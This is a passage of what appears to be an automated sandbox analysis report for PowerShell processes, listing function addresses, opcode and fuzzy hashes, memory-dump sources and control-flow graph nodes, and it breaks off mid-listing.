                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9bafc06a6c8009ceb9e2af18042c8345537f645b4d7de0df382ab6850d22bb34
                                                                                                          • Instruction ID: 750ed8323e1e53562c53db5e668bef1cb61065430ced0542209007281ea93897
                                                                                                          • Opcode Fuzzy Hash: 9bafc06a6c8009ceb9e2af18042c8345537f645b4d7de0df382ab6850d22bb34
                                                                                                          • Instruction Fuzzy Hash: A7511A3190CB4C8FDB59DF6C8C4A7E97FE1EB56321F1442ABD048C7152CA745416CBA1
                                                                                                          Function 00007FFC4ACF2D6A Relevance: .2, Instructions: 191COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 692bcf772677b4a0b233153347ee4d67909fdbd9f8ad6553f4722fe247bdcdeb
                                                                                                          • Instruction ID: 1217302b24503d5932c88d087a02a5f60b48ec10ac9bf42a2e4130c18e24c12d
                                                                                                          • Opcode Fuzzy Hash: 692bcf772677b4a0b233153347ee4d67909fdbd9f8ad6553f4722fe247bdcdeb
                                                                                                          • Instruction Fuzzy Hash: 55516C3190DB8D4FD749DF2C98456F57FE0EF56321F1442BBE048CB192DA666806CBA2
                                                                                                          Function 00007FFC4ADB27FA Relevance: .1, Instructions: 111COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3152320518.00007FFC4ADB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ADB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4adb0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9dc46572756c4bc8e1d31d8f11252dfe84f9189620f46349d5a1c7184517e2b2
                                                                                                          • Instruction ID: 49ad46a3e4736ddf7d28edf63bcb145ed152952b1ed07004fbbc05c5a58b3746
                                                                                                          • Opcode Fuzzy Hash: 9dc46572756c4bc8e1d31d8f11252dfe84f9189620f46349d5a1c7184517e2b2
                                                                                                          • Instruction Fuzzy Hash: CC31C422B1CE2D4FEBA9AD1C54116F9B6D2DF58720B6805FBC50EC7196DD04EC11C2A5
                                                                                                          Function 00007FFC4ACEB658 Relevance: .1, Instructions: 104COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98c35756ec99280abb52d01ec87b156bc36c4c0a526a600556bb332d20d0c966
                                                                                                          • Instruction ID: 654267b645de130dff41fd49eb835adbdae739f0d3724d20ecb7af364496b5ca
                                                                                                          • Opcode Fuzzy Hash: 98c35756ec99280abb52d01ec87b156bc36c4c0a526a600556bb332d20d0c966
                                                                                                          • Instruction Fuzzy Hash: 4131063190CA4C8FEB58EF98D84A7F97BE0EF66321F14416FD049C7192CA75A816CB51
                                                                                                          Function 00007FFC4ACEF684 Relevance: .1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f1cfac652ce91a986b68098efa31d1a4b63b269e329d5f6e732696711e944cf0
                                                                                                          • Instruction ID: 2f0b7282d589eba932cd3d62d0612a50012ad4d8ec8f9ef87966e1cff81dcf09
                                                                                                          • Opcode Fuzzy Hash: f1cfac652ce91a986b68098efa31d1a4b63b269e329d5f6e732696711e944cf0
                                                                                                          • Instruction Fuzzy Hash: 67311B3091966DCEFBB4EF14CC06BFA3296FB41319F600179D44D861D2CA3A6985CA61
                                                                                                          Function 00007FFC4ADB2818 Relevance: .1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3152320518.00007FFC4ADB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ADB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4adb0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 597f9b295316c063f9f3dfd4bb0dc54fb6a49f66d719dae5f59e84fe4e345c33
                                                                                                          • Instruction ID: b651c2d124b51d3cb83ea8d14339581f42b859090c5ce1ba31c75cd7e27ddaa2
                                                                                                          • Opcode Fuzzy Hash: 597f9b295316c063f9f3dfd4bb0dc54fb6a49f66d719dae5f59e84fe4e345c33
                                                                                                          • Instruction Fuzzy Hash: 2C01D667F1ED2E4BFAADA91C14252F855C3DF84310B6805FAC40ECB196DD08EC01D261
                                                                                                          Function 00007FFC4ACE37B5 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cdf27830e6da78c8404a4c0c86de325c6268414c47b103d82231694f5e6a2248
                                                                                                          • Instruction ID: bbcab999e9ec9da85529169bd5135b5716b602f538dc93c9d09eefb05288eec7
                                                                                                          • Opcode Fuzzy Hash: cdf27830e6da78c8404a4c0c86de325c6268414c47b103d82231694f5e6a2248
                                                                                                          • Instruction Fuzzy Hash: 9E01677115CB0D8FD744EF0CE451AA6B7E0FB99324F10056DE58AC3651D636E882CB45
                                                                                                          Function 00007FFC4B450670 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3164017163.00007FFC4B450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4B450000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4b450000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 075fd37e3f5f1309c476dfce1bb74fab6bbd098caf447e4725e70290fcc9bd67
                                                                                                          • Instruction ID: 00da24e044e095e9221d3e793488cfa74623fe7e269dbbd5468f7a3cde1f3a48
                                                                                                          • Opcode Fuzzy Hash: 075fd37e3f5f1309c476dfce1bb74fab6bbd098caf447e4725e70290fcc9bd67
                                                                                                          • Instruction Fuzzy Hash: B6F0225290DEBF4FFAA4EA3C58590B02AE0EF5622070810FAD04EC72E3DC0D1C82C366
                                                                                                          Function 00007FFC4ACF588D Relevance: .0, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 592e1609c283042bca4e77988995f11229b9f3c930bd87e7b8a322a57b0f7809
                                                                                                          • Instruction ID: e5818b15bb392a5bd019ad2833882ad57ee534ccc639977a17a46f15b8152a44
                                                                                                          • Opcode Fuzzy Hash: 592e1609c283042bca4e77988995f11229b9f3c930bd87e7b8a322a57b0f7809
                                                                                                          • Instruction Fuzzy Hash: 1EC01233A1E52D496A88B948B8031FC6381EB8A130A2000B7E24A82882A917202385DA

                                                                                                          Non-executed Functions

                                                                                                          Function 00007FFC4ADB32CD Relevance: .9, Instructions: 925COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3152320518.00007FFC4ADB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ADB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4adb0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a8105fa9f94b6c6c843e445666f06140a7d64058280f40afaa907c5bc4e3548e
                                                                                                          • Instruction ID: d114b8ecc7a25b43fdad6593149a3949aa2d59f2fa3bd55b3fe64d442f159669
                                                                                                          • Opcode Fuzzy Hash: a8105fa9f94b6c6c843e445666f06140a7d64058280f40afaa907c5bc4e3548e
                                                                                                          • Instruction Fuzzy Hash: 5152266190DBDA4FEB9AEB3848551F17FE2EF56320B2901FBC049CB593D9189C06D362
                                                                                                          Function 00007FFC4ACF0C2A Relevance: .4, Instructions: 396COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 523e6bd810e382ec1577c4b50ab09cb74955ce1de7c18faa68c0ba0190b578ea
                                                                                                          • Instruction ID: 59fd32ffe05b2219e5f1edf1d5da7d35efb34101e2c88191efea16398ee32597
                                                                                                          • Opcode Fuzzy Hash: 523e6bd810e382ec1577c4b50ab09cb74955ce1de7c18faa68c0ba0190b578ea
                                                                                                          • Instruction Fuzzy Hash: 9BC14A43A0F9CF5FF7D5C92C3C15235AFC7EB56A5072802FAE0884B0CFA85A5916C266
                                                                                                          Function 00007FFC4ACE2B13 Relevance: 8.0, Strings: 6, Instructions: 458COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Gp_H$HcJ$HcJ$Hp_H$\J$\J
                                                                                                          • API String ID: 0-3479145561
                                                                                                          • Opcode ID: 6a7d9d9b6f5f1127fe45d54378ad95d91c11dc7e087280b40e49eff62befa71a
                                                                                                          • Instruction ID: 1bbb6688e051626104640d324482c6def7d5defb0d4396a22415fe53634b923f
                                                                                                          • Opcode Fuzzy Hash: 6a7d9d9b6f5f1127fe45d54378ad95d91c11dc7e087280b40e49eff62befa71a
                                                                                                          • Instruction Fuzzy Hash: 60C10B22A0EAAE4FEB81EB3CE8545E57BD1DF9626172401F7D04DCF193D919A806C770

                                                                                                          Executed Functions

                                                                                                          Function 00007FFC4ABCEF00 Relevance: .1, Instructions: 124COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.3010338392.00007FFC4ABCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ABCD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ffc4abcd000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd5f36f2650c0b40df9019513278b31e7e7f6934f7700c2636d3152f50127d2f
                                                                                                          • Instruction ID: 1c8726d6d93f16af836b20c83e966e0992b300c9dc9fe6b2768880f67d14d9a7
                                                                                                          • Opcode Fuzzy Hash: cd5f36f2650c0b40df9019513278b31e7e7f6934f7700c2636d3152f50127d2f
                                                                                                          • Instruction Fuzzy Hash: 7A41437080DBC89FE7569B289C559523FF1EF57320B1905DFD088CB1A3D629AC4AC7A2
                                                                                                          Function 00007FFC4ACE3C85 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.3010977241.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4e4b6f54dee9b92aff0aca1f73b2de7a40c03dc3d97c823d98ff87e81fe247d4
                                                                                                          • Instruction ID: 99a0ea3a1c89ba0f69f40b564e85b4998da022ff3da725e4ee4bacd106a145ab
                                                                                                          • Opcode Fuzzy Hash: 4e4b6f54dee9b92aff0aca1f73b2de7a40c03dc3d97c823d98ff87e81fe247d4
                                                                                                          • Instruction Fuzzy Hash: F801677115CB0C8FD744EF0CE451AA6B7E0FB95324F50056DE58AC3651D636E882CB45

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:4.1%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:3
                                                                                                          Total number of Limit Nodes:0
                                                                                                          execution_graph 6758 7ffc4acfe598 6760 7ffc4acfe5a1 LoadLibraryExW 6758->6760 6761 7ffc4acfe72d 6760->6761

                                                                                                          Executed Functions

                                                                                                          Function 00007FFC4B22299B Relevance: 3.2, Strings: 2, Instructions: 667COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 7ffc4b22299b-7ffc4b2229fe 5 7ffc4b222a00-7ffc4b222a51 0->5 6 7ffc4b222a52-7ffc4b222abb 0->6 16 7ffc4b222abd-7ffc4b222ad2 6->16 17 7ffc4b222ad3-7ffc4b222ae7 6->17 19 7ffc4b222af0-7ffc4b222aff 17->19 20 7ffc4b222ae9 17->20 21 7ffc4b222b01 19->21 22 7ffc4b222b08-7ffc4b222b17 19->22 20->19 21->22 23 7ffc4b222b20-7ffc4b222b2f 22->23 24 7ffc4b222b19 22->24 25 7ffc4b222b31 23->25 26 7ffc4b222b38-7ffc4b222b47 23->26 24->23 25->26 27 7ffc4b222b50-7ffc4b222c0f 26->27 28 7ffc4b222b49 26->28 32 7ffc4b222d73-7ffc4b222e27 27->32 33 7ffc4b222c15-7ffc4b222c1f 27->33 28->27 71 7ffc4b222e30-7ffc4b222e3f 32->71 72 7ffc4b222e29 32->72 34 7ffc4b222c21-7ffc4b222c39 33->34 35 7ffc4b222c3b-7ffc4b222c48 33->35 34->35 42 7ffc4b222c4e-7ffc4b222c51 35->42 43 7ffc4b222d08-7ffc4b222d12 35->43 42->43 47 7ffc4b222c57-7ffc4b222c5f 42->47 45 7ffc4b222d25-7ffc4b222d70 43->45 46 7ffc4b222d14-7ffc4b222d24 43->46 45->32 47->32 48 7ffc4b222c65-7ffc4b222c6f 47->48 51 7ffc4b222c71-7ffc4b222c7f 48->51 52 7ffc4b222c89-7ffc4b222c8f 48->52 51->52 57 7ffc4b222c81-7ffc4b222c87 51->57 52->43 54 7ffc4b222c91-7ffc4b222c94 52->54 54->43 58 7ffc4b222c96-7ffc4b222c99 54->58 57->52 59 7ffc4b222cc0 58->59 60 7ffc4b222c9b-7ffc4b222cbe 58->60 64 7ffc4b222cc2-7ffc4b222cc4 59->64 60->64 64->43 67 7ffc4b222cc6-7ffc4b222cdc 64->67 73 7ffc4b222ce3-7ffc4b222ceb 67->73 74 7ffc4b222e41 71->74 75 7ffc4b222e48-7ffc4b222ebf 71->75 72->71 76 7ffc4b222ced-7ffc4b222cf1 73->76 77 7ffc4b222cf3-7ffc4b222cf8 73->77 74->75 83 7ffc4b222ec1-7ffc4b222eca 75->83 84 7ffc4b222ecb-7ffc4b222ed5 75->84 79 7ffc4b222cf9-7ffc4b222d07 76->79 77->79 85 7ffc4b222ee0-7ffc4b222f1f 84->85 86 7ffc4b222ed7-7ffc4b222edf 84->86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3818333343.00007FFC4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4B220000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4b220000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: x6]^$x6]^
                                                                                                          • API String ID: 0-2747009302
                                                                                                          • Opcode ID: 085079915c4e1bdd1047284f7bc638a71a5096f33d7e87450a3293509e2ff536
                                                                                                          • Instruction ID: 2e7bb7a188b0cb5db57ea11d6de8520ce7380526de90ed19f355f0e6dd75d0b7
                                                                                                          • Opcode Fuzzy Hash: 085079915c4e1bdd1047284f7bc638a71a5096f33d7e87450a3293509e2ff536
                                                                                                          • Instruction Fuzzy Hash: 84125C3190DBD94FEB6AA73858655B53FE1EF47220B0809FFD489CB0B3D9196846C362
                                                                                                          Function 00007FFC4ACFE598 Relevance: 1.7, APIs: 1, Instructions: 227libraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 190 7ffc4acfe598-7ffc4acfe59f 191 7ffc4acfe5aa-7ffc4acfe60f 190->191 192 7ffc4acfe5a1-7ffc4acfe5a9 190->192 195 7ffc4acfe619-7ffc4acfe64b 191->195 196 7ffc4acfe611-7ffc4acfe616 191->196 192->191 198 7ffc4acfe653-7ffc4acfe67b 195->198 199 7ffc4acfe64d 195->199 196->195 200 7ffc4acfe686-7ffc4acfe6ef 198->200 201 7ffc4acfe67d-7ffc4acfe685 198->201 199->198 204 7ffc4acfe6f9-7ffc4acfe72b LoadLibraryExW 200->204 205 7ffc4acfe6f1-7ffc4acfe6f6 200->205 201->200 206 7ffc4acfe733-7ffc4acfe75a 204->206 207 7ffc4acfe72d 204->207 205->204 207->206
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3797461126.00007FFC4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4acf0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: 361bf1ee2e5366ff18e33a4986a8784e2963996c02f6c2911a92fc5c9a0cc2e6
                                                                                                          • Instruction ID: aaf4ef0ce28618ac7fd33ae3ca71e5e8a49f99ddd169c63ed6ed76c314c394dd
                                                                                                          • Opcode Fuzzy Hash: 361bf1ee2e5366ff18e33a4986a8784e2963996c02f6c2911a92fc5c9a0cc2e6
                                                                                                          • Instruction Fuzzy Hash: F961B13190CA5C8FDB59DFA8C849BE9BBE1EF56321F04826BD049C3191DB74A416CBA1
                                                                                                          Function 00007FFC4ACFE3F2 Relevance: 1.7, APIs: 1, Instructions: 211libraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 209 7ffc4acfe3f2-7ffc4acfe60f 212 7ffc4acfe619-7ffc4acfe64b 209->212 213 7ffc4acfe611-7ffc4acfe616 209->213 215 7ffc4acfe653-7ffc4acfe67b 212->215 216 7ffc4acfe64d 212->216 213->212 217 7ffc4acfe686-7ffc4acfe6ef 215->217 218 7ffc4acfe67d-7ffc4acfe685 215->218 216->215 221 7ffc4acfe6f9-7ffc4acfe72b LoadLibraryExW 217->221 222 7ffc4acfe6f1-7ffc4acfe6f6 217->222 218->217 223 7ffc4acfe733-7ffc4acfe75a 221->223 224 7ffc4acfe72d 221->224 222->221 224->223
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3797461126.00007FFC4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4acf0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: 523052e702da5b77a82eb95321dcda4d267e2a05edbf4a4b106dd6ef76bad946
                                                                                                          • Instruction ID: 692651a1487f3a01883abe8596531824235cd9a992a38358821f17d01e8db30d
                                                                                                          • Opcode Fuzzy Hash: 523052e702da5b77a82eb95321dcda4d267e2a05edbf4a4b106dd6ef76bad946
                                                                                                          • Instruction Fuzzy Hash: 1F51C13190CA1C9FDB59DF98C849BE9BBE1FF69321F04826BD009D3251DB74A416CB91
                                                                                                          Function 00007FFC4ACFE08A Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 226 7ffc4acfe08a-7ffc4acfe6ef 229 7ffc4acfe6f9-7ffc4acfe72b LoadLibraryExW 226->229 230 7ffc4acfe6f1-7ffc4acfe6f6 226->230 231 7ffc4acfe733-7ffc4acfe75a 229->231 232 7ffc4acfe72d 229->232 230->229 232->231
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3797461126.00007FFC4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4acf0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: 13836afd2c6fc0404fe72ca7696bfd506c3d117dd10e82c4b98a893df52add8f
                                                                                                          • Instruction ID: 0b17d5bee9f6abeb19531ee4708651a1670dc2d2e3a0fdc9d14c6c57867ff3af
                                                                                                          • Opcode Fuzzy Hash: 13836afd2c6fc0404fe72ca7696bfd506c3d117dd10e82c4b98a893df52add8f
                                                                                                          • Instruction Fuzzy Hash: C7219171908A2C9FDB58DF98C849BE9BBE1FB59321F10822FD00AD3251DB70A456CB91
                                                                                                          Function 00007FFC4ADC309E Relevance: 1.1, Instructions: 1056COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 234 7ffc4adc309e-7ffc4adc30a8 235 7ffc4adc30a9-7ffc4adc30b1 234->235 236 7ffc4adc31d1-7ffc4adc326c 234->236 237 7ffc4adc30fb-7ffc4adc3113 235->237 238 7ffc4adc30b2-7ffc4adc30b8 235->238 247 7ffc4adc3115-7ffc4adc315c 237->247 241 7ffc4adc30d7-7ffc4adc30e3 238->241 242 7ffc4adc30ba-7ffc4adc30d5 238->242 241->236 244 7ffc4adc30e9-7ffc4adc30f6 241->244 242->241 244->247 248 7ffc4adc30f8-7ffc4adc30f9 244->248 258 7ffc4adc315e-7ffc4adc3171 247->258 248->237 259 7ffc4adc3178-7ffc4adc317b 258->259 260 7ffc4adc28b9-7ffc4adc28c5 259->260 261 7ffc4adc3181-7ffc4adc3195 259->261 260->236 262 7ffc4adc28cb-7ffc4adc28d8 260->262 261->260 264 7ffc4adc28da-7ffc4adc28e7 262->264 265 7ffc4adc28f1-7ffc4adc290b 262->265 264->265 270 7ffc4adc28e9-7ffc4adc28ef 264->270 267 7ffc4adc294a-7ffc4adc2956 265->267 268 7ffc4adc290d-7ffc4adc2942 265->268 267->236 269 7ffc4adc295c-7ffc4adc2969 267->269 268->267 273 7ffc4adc296b-7ffc4adc2980 269->273 274 7ffc4adc2982-7ffc4adc2992 269->274 270->265 273->274 274->236 276 7ffc4adc2998-7ffc4adc29a2 274->276 279 7ffc4adc29a4-7ffc4adc29b9 276->279 280 7ffc4adc29bb-7ffc4adc29c7 276->280 279->280 280->236 282 7ffc4adc29cd-7ffc4adc29d7 280->282 283 7ffc4adc29d9-7ffc4adc29e7 282->283 284 7ffc4adc29f1-7ffc4adc2a38 282->284 283->284 288 7ffc4adc29e9-7ffc4adc29ef 283->288 284->236 292 7ffc4adc2a3e-7ffc4adc2a4b 284->292 288->284 293 7ffc4adc2a65-7ffc4adc2a76 292->293 294 7ffc4adc2a4d-7ffc4adc2a5b 292->294 293->236 295 7ffc4adc2a7c-7ffc4adc2a86 293->295 294->293 299 7ffc4adc2a5d-7ffc4adc2a63 294->299 297 7ffc4adc2aa4-7ffc4adc2ab0 295->297 298 7ffc4adc2a88-7ffc4adc2aa1 295->298 297->236 301 7ffc4adc2ab6-7ffc4adc2ac0 297->301 298->297 299->293 303 7ffc4adc2ac6-7ffc4adc2adb 301->303 304 7ffc4adc319a-7ffc4adc319f 301->304 307 7ffc4adc2ae6-7ffc4adc2b57 303->307 308 7ffc4adc2add-7ffc4adc2ae3 303->308 306 7ffc4adc31a7-7ffc4adc31bc 304->306 307->306 316 7ffc4adc2b5d-7ffc4adc2ba6 307->316 308->307 321 7ffc4adc2ba8-7ffc4adc2be5 316->321 322 7ffc4adc2bec-7ffc4adc2bfb 316->322 321->322 324 7ffc4adc2be7 322->324 325 7ffc4adc2bfd-7ffc4adc2c0a 322->325 324->322 327 7ffc4adc2c0c-7ffc4adc2c21 325->327 328 7ffc4adc2c23-7ffc4adc2c2e 325->328 327->328 328->324 330 7ffc4adc2c30-7ffc4adc2c3d 328->330 331 7ffc4adc2c56-7ffc4adc2c61 330->331 332 7ffc4adc2c3f-7ffc4adc2c4c 330->332 331->324 335 7ffc4adc2c63-7ffc4adc2c6d 331->335 332->331 337 7ffc4adc2c4e-7ffc4adc2c54 332->337 339 7ffc4adc2c87-7ffc4adc2c8b 335->339 340 7ffc4adc2c6f-7ffc4adc2c7d 335->340 337->331 339->324 342 7ffc4adc2c91-7ffc4adc2c9b 339->342 340->339 344 7ffc4adc2c7f-7ffc4adc2c85 340->344 345 7ffc4adc2cb4-7ffc4adc2cfb 342->345 346 7ffc4adc2c9d-7ffc4adc2caa 342->346 344->339 345->324 354 7ffc4adc2d01-7ffc4adc2d0b 345->354 346->345 349 7ffc4adc2cac-7ffc4adc2cb2 346->349 349->345 355 7ffc4adc2d25-7ffc4adc2d31 354->355 356 7ffc4adc2d0d-7ffc4adc2d1b 354->356 355->324 357 7ffc4adc2d37-7ffc4adc2d41 355->357 356->355 361 7ffc4adc2d1d-7ffc4adc2d23 356->361 359 7ffc4adc2d5b-7ffc4adc2dcc 357->359 360 7ffc4adc2d43-7ffc4adc2d59 357->360 359->324 369 7ffc4adc2dd2-7ffc4adc2ddf 359->369 360->359 361->355 370 7ffc4adc2df8-7ffc4adc2e08 369->370 371 7ffc4adc2de1-7ffc4adc2df6 369->371 370->324 372 7ffc4adc2e0e-7ffc4adc2e18 370->372 371->370 374 7ffc4adc2e1a-7ffc4adc2e27 372->374 375 7ffc4adc2e31-7ffc4adc2e3d 372->375 374->375 379 7ffc4adc2e29-7ffc4adc2e2f 374->379 375->324 378 7ffc4adc2e43-7ffc4adc2e4d 375->378 380 7ffc4adc2e66-7ffc4adc2ead 378->380 381 7ffc4adc2e4f-7ffc4adc2e64 378->381 379->375 380->324 388 7ffc4adc2eb3-7ffc4adc2ebd 380->388 381->380 389 7ffc4adc2ed6-7ffc4adc2ee2 388->389 390 7ffc4adc2ebf-7ffc4adc2ed4 388->390 389->324 392 7ffc4adc2ee8-7ffc4adc2ef2 389->392 390->389 393 7ffc4adc2ef4-7ffc4adc2f10 392->393 394 7ffc4adc2f12-7ffc4adc2f78 392->394 393->394 404 7ffc4adc2f7a-7ffc4adc2fac 394->404 405 7ffc4adc2fcf-7ffc4adc2fe3 394->405 408 7ffc4adc2feb-7ffc4adc2ff7 404->408 409 7ffc4adc2fae-7ffc4adc2fce 404->409 405->408 408->236 410 7ffc4adc2ffd-7ffc4adc3007 408->410 409->405 412 7ffc4adc3026-7ffc4adc3032 410->412 413 7ffc4adc3009-7ffc4adc3024 410->413 412->236 416 7ffc4adc3038-7ffc4adc3042 412->416 413->412 417 